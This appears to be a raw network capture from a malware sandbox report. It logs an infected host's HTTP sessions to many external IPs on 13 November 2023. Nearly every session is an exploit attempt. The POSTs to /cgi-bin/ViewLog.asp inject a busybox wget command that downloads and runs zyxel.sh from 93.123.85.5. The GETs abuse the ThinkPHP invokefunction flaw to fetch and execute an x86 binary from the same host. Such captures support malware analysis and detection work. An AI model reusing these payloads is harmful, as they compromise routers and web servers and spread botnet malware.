                                                              Nov 13, 2023 22:19:33.521888971 CET11498OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:36.776997089 CET11899OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:42.920031071 CET12645OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:54.950515985 CET14257OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:19.523226976 CET17304OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:08.668772936 CET20703OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              562192.168.2.233464294.120.25.2198080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:33.531635046 CET11498OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              563192.168.2.234772462.29.46.1988080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:33.535155058 CET11499OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              564192.168.2.235664895.217.182.21680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:33.608524084 CET11501OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:33.918639898 CET11596INHTTP/1.1 400 Bad Request
                                                              Server: nginx/1.14.1
                                                              Date: Mon, 13 Nov 2023 21:19:33 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 173
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              565192.168.2.234117695.182.123.24280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:33.640918016 CET11502OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:33.982569933 CET11608INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:19:33 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              566192.168.2.235064262.210.131.2168080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:33.809142113 CET11588OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:34.159743071 CET11616INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:19:33 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 162
                                                              Connection: keep-alive
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              567192.168.2.233426462.140.237.378080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:33.824911118 CET11589OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:34.151562929 CET11614INHTTP/1.1 404 Not Found
                                                              Connection: keep-alive
                                                              Content-Length: 74
                                                              Content-Type: text/html
                                                              Date: Mon, 13 Nov 2023 21:19:33 GMT
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>Error</title></head><body>404 - Not Found</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              568192.168.2.234621831.136.62.398080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:33.826904058 CET11590OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:34.825068951 CET11751OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:36.808816910 CET11901OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:40.872394085 CET12417OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:48.807259083 CET13473OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:04.677258015 CET15427OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:37.952863932 CET19617OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              569192.168.2.234037631.200.39.2288080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:33.837295055 CET11591OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              5794.255.202.318080192.168.2.2333534
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:17.291799068 CET2205INHTTP/1.0 400 Bad Request
                                                              Server: tinyproxy/1.8.2
                                                              Content-Type: text/html
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              570192.168.2.234047894.122.24.2198080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:33.840356112 CET11591OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              571192.168.2.235810094.122.105.2378080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:33.841871977 CET11592OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              572192.168.2.235214494.123.181.438080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:33.842380047 CET11593OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              573192.168.2.235199085.234.37.138080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:33.865891933 CET11595OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:34.234522104 CET11619INHTTP/1.0 200 OK
                                                              Server: httpd/2.0
                                                              Date: Mon, 13 Nov 2023 21:20:31 GMT
                                                              Content-Type: text/html
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 73 63 72 69 70 74 3e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 4d 61 69 6e 5f 4c 6f 67 69 6e 2e 61 73 70 3f 65 72 72 6f 72 5f 73 74 61 74 75 73 3d 31 26 70 61 67 65 3d 69 6e 64 65 78 2e 61 73 70 26 6c 6f 63 6b 5f 74 69 6d 65 3d 30 27 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 48 45 41 44 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><script>top.location.href='/Main_Login.asp?error_status=1&page=index.asp&lock_time=0';</script></HEAD></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              574192.168.2.236029895.189.103.21080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:33.968564987 CET11607OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:34.389628887 CET11645INData Raw: 28 6e 75 6c 6c 29 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 31 34 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 31 39 3a 33 33 20 47 4d 54 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74
                                                              Data Ascii: (null) 400 Bad RequestServer: Date: Tue, 14 Nov 2023 00:19:33 GMTX-Frame-Options: DENYX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Language: enContent-Type: text/htmlCache-Control: no-cache,no-store,max


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              575192.168.2.234362685.236.148.278080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:34.409881115 CET11646OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:34.707612038 CET11665INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:19:33 GMT
                                                              Connection: close
                                                              Content-Length: 311
